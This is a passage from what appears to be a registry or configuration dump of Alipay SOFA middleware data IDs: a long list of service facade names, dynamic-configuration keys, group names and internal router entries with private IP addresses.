69.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_B_PORTAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.checkroute.common.service.datacollect.HADataClientConfigDrm.enableCollectDuringTransmit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.payment.KmallColumnQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.outerServiceEventLoadCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_DBACKPRODRECEIPT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_INSURE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileiclib.common.service.facade.zproxy.SecurityPolicyVerifyZpFacade:1.0:mobileic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.table.query.TableQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCJiebeiMaterialsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2TrustTransactionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edubizsp.common.service.facade.blockchain.BlockChainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-priceInvalidateTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.discount.DiscountApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:nfcc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsContractQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.tabYebEquityShow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findecision.common.service.facade.instdata.ModelQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.144.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.150.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.28.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.accordercore.common.service.facade.control.auth.api.TrusteeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.DispositionSchemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.analysis.ItellectStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.repay.CustAcctRepayPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.commandcenter.itestmngDataSource_OB_gc.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:graycore_grayDiagnosisService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliapy.boot.test.sofarpc.starter.demo.ConfigDemoService:1.0:service-tr4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.biz.censor.fault.CensorSameobjectidAffectManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.searchportal.common.service.facade.appcenter.SchAppDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.alarmanalysis.UrgeIssueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test8@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccore.facade.WaiterSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.morderprod.common.service.facade.SignProductQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.prototype2.ActivityInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transfercenter.common.service.facade.api.TransferTrustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.arrangement.ARRepayAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.AssetPositionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.GroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.riskrank.UctCustomerRiskRankNewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.service.OpenApiService:1.0:openapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_bbcmng_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acmarketingcore.common.service.facade.coupon.open.CouponOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.fake.shared.service.bypass.collect.CollectionFlowManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.zdal.ldc.tair.membercenterTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_trans_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dsmp.common.service.facade.privilege.service.v2.CoCreateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ufe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.pkgCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.admgr.common.service.facade.AdPidCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finpwm.FinpwmSavingPlanQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:hainaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.orderfront.common.service.facade.solution.api.SolutionOrderRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpSpaceManageMenuApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:aiceTaskLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.insurance.service.repository.BizIdentityConfigDataRepositoryFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.account.service.FinsignAccountManageFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifecore.common.service.facade.genericdata.GenericBizDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_AGDS_TO_ZHIMA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rockfuzz.common.service.facade.FuzzRepositoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:promoplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_ACCORDERCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openhome.facade.NoticeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.merchant.KbMerchantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:finreconchecker_singleor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.192.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.182.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:accordercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.101.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbactivityprod.common.service.manage.CommonBizDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_REVCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.recproxy.common.service.facade.api.RecommendFacade:1.0:fortune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifincore.facade.channel.ChannelIntegrationSolutionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.session.sessionConfigDrm.dataSeparate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FINAUTH#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.PromobenchGrayTaskManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.distinguishprod.ResIdentifyPkgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.appointment.service.ProprietaryAppointmentActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@kbsales#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mcomment.common.service.facade.comment.CommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.TransportWidgetServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.agent.AgentOperationFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:dcprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetlibview.facade.api.AssetSplitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.monitor.alert.AlertQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:ordermng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.ctuUidBlackListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbomp.common.service.facade.migration.api.MigrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.facade.UserLabelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_K_CIFPROCESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.BillDownloadResource.callbackUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-kbcraftsman-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.chairCITGM.facade.HelloService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gftms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.live.api.LiveRelatedProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.finaccenter.facade.api.CoaSelfOperateFacede:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartsql.service.facade.service.TableServerV2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundtrade.common.service.facade.api.FundForceRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopprod.common.service.facade.BatchOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BKOPSMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.material.MaterialRuleItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.appstore.common.service.facade.item.AppStoreItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acpartner.common.service.facade.open.PartnerOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.financingtrans.FintransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icontrol.common.service.facade.router.RouterDispatchServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tax.tr.TaxRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finassetpreference-schduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:transfercenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_COUNTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.33.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.ResidenceRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.RoleService:1.0:roleService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_EBPP_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.242.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfsettle.facade.api.SettlementBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfusion.common.service.facade.contentfusion.CardTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofaboottest02@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paymentmng.service.facade.paycore.PaycoreCacheManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.policy.api.QueryUriRepositoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.215.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:checkacceptancedrc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:trafficcardsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanbatch.facade.BatchTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.audit.strategy.drm.TestRunTaskResource.testRunTaskStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.shared.utils.NodeParameters.idcBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.sitecenter:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.irisbizprod.facade.common.biz.runtime.flow.service.CustomAntmonitorFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:lifeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.AuthRecordServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.55.75.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.91.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.sdk.change.callback.OpsChngServiceCallback:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.unitradeprod.common.facade.service.OrderPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tss.coopr.common.service.facade.pkg.ProcessInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.life.LifeSubscriptionManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:pushOrderAndSubOrderToSuccessHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insautoagent.common.telworkbench.AutoInsLeadsCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_6200#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.68.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketStoreAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ExecutionControlFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.FileDrillServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BAR#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.feeclcn.common.service.facade.FeeTrialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.executeToNewSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.chargefront.GoldenDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointprod.commom.manage.facade.deposit.api.PointProdDepositContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.UserSeatServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayRemindDrmResource.minId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileops.common.service.facade.SxmConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.cif.l2cache.L2CacheClientSwitch.versionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.AssetOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuthFacade:1.0:iam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.InsMktProdSNSAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.discardMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.sync.api.FinBackFlowSyncInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developertool.facade.ia.FactorMockUtil:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spannermng.common.service.facade.SpannerConfOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.27.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.h5secure.SecureHostWhiteListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.TopNewsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.test.CrmTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.datacollect.HADataClientConfigDrm.collectedDataMaxSizeKB,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.poscore.common.service.facade.creditcardfp.PaymentCustomService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.common.service.facade.miniapp.EinvInvoiceApplyShowFacade:1.0:einvInvoiceApplyShowFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1210#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.48.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mdatadecision.common.service.facade.InsightQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_M_FINANCE_STOCK_T#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:creditutcoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:loanschedulerweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceNoticeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.tinyapp.TinyAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.action.ActionService:1.0:mobileChatDisGroupStatusServiceBean@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecItemServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.prod.AccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bkloanfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualityprod.service.facade.coregraph.query.ISceneIndicatorUnusualQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antsycm.common.service.facade.report.MdataPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:minialipayweb-sff-antvip-test-one@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:das@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ins_user_auth_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityDoneeItemGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1100#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.publishing.common.facade.publish.PublishSpi:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.aif.plan.PlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.88.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ecquery.common.service.invest.DirectInvestInfoQueryFacade:1.0:directInvestInfoQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilogin.common.service.facade.api.oauth.OauthTokenMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.